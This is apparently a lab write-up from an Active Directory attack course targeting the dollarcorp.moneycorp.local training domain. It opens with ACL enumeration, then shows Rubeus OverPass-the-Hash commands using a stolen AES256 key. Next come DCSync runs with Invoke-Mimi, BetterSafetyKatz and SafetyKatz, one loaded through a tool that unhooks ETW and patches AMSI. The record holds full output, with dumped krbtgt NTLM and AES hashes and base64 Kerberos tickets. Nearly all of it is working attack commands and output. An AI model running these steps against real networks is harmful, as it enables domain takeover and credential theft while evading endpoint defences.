AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Administrators

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers
AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceType : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
IdentityName : mcorp\Enterprise Admins

AceType : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Local System

Execution
To obtain the hash of the krbtgt account we need to have domain administrative privileges or we must
have the rights to execute the DCSync attack.
We already have the hash of one of the domain Admin "svcadmin". We will use a OverPass The Hash
attack to open a command prompt or PowerShell with Domain Administrator privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : 64L72Z6Q
[*] Domain : S38MUUI4
[*] Password : OBSF3AIL
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4832
[+] LUID : 0xcad172

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 13291890
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xcad172
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 4:13:52 AM
EndTime : 6/27/2024 2:13:52 PM
RenewTill : 7/4/2024 4:13:52 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : jWUpQfgQMtCaBUE7Cn23GxbwIOmAtlnd+eKEVow8CPY=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with Domain Administrator (svcadmin) privileges. We will now execute
the DCSync attack.

Using Invoke-Mimi
We will execute the following commands in the new command prompt.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
 23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

Using BetterSafetyKatz
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : NL2FSF84
[*] Domain : K56PH4IX
[*] Password : O81FOKUN
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5508
[+] LUID : 0x1d1f34

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1908532
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x1d1f34
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 8:13:06 AM
EndTime : 6/27/2024 6:13:06 PM
RenewTill : 7/4/2024 8:13:06 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 7zdea1FF/9s1plbSpc+Nc+qbaB51pOFqRYIg81WB9Z0=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt with the Domain Administrator privileges opens.

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
 base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
 aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Using SafetyKatz
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
 v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : 09CSYUSB
[*] Domain : 0A6XLNG4
[*] Password : J878WGBV
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4304
[+] LUID : 0x2c84e0

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 2917600
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x2c84e0
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 9:55:33 AM
EndTime : 6/27/2024 7:55:33 PM
RenewTill : 7/4/2024 9:55:33 AM
 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
